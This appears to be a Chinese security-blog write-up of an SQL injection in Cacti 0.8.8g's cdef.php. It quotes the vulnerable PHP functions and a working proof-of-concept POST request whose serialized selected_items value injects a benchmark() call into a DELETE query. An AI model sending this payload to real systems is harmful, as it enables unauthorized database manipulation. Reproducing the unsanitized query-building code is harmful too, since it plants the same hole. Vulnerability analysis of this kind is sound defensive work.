cacti 0.8.8g cdef.php selected_items 存在sql注入

  • A+
所属分类:漏洞时代
摘要

问题出现在文件cdef.php里面的form_actions函数里面跟进array_to_sql_or(),在/lib/database.php中发现了

问题出现在文件cdef.php里面的form_actions函数里面

function form_actions() {     global $colors, $cdef_actions;      /* if we are to save this form, instead of display it */     if (isset($_POST["selected_items"])) {         $selected_items = unserialize(stripslashes($_POST["selected_items"]));          if ($_POST["drp_action"] == "1") { /* delete */             db_execute("delete from cdef where " . array_to_sql_or($selected_items, "id"));             db_execute("delete from cdef_items where " . array_to_sql_or($selected_items, "cdef_id"));          }elseif ($_POST["drp_action"] == "2") { /* duplicate */             for ($i=0;($i<count($selected_items));$i++) {                 /* ================= input validation ================= */                 input_validate_input_number($selected_items[$i]);                 /* ==================================================== */                  duplicate_cdef($selected_items[$i], $_POST["title_format"]);             }         }          header("Location: cdef.php");         exit;     }

跟进array_to_sql_or(),在/lib/database.php中发现了

function array_to_sql_or($array, $sql_column) {     /* if the last item is null; pop it off */     if ((empty($array{count($array)-1})) && (sizeof($array) > 1)) {         array_pop($array);     }      if (count($array) > 0) {         $sql_or = "($sql_column IN(";          for ($i=0;($i<count($array));$i++) {             if (is_array($array[$i]) && array_key_exists($sql_column, $array[$i])) {                 $sql_or .= (($i == 0) ? "'":",'") . $array[$i][$sql_column] . "'";             } else {                 $sql_or .= (($i == 0) ? "'":",'") . $array[$i] . "'";             }         }          $sql_or .= "))";          return $sql_or;     } }
 POST /cdef.php?action=actions HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: Cacti=fvb36noraocv8etfbrvokrle81 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 112  selected_items=a:1:{i:0;s:31:"',benchmark(10000000,sha1(1)),'";}&drp_action=1 

实际Mysql执行的是

delete from cdef_items where (cdef_id IN('',benchmark(10000000,sha1(1)),''))

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: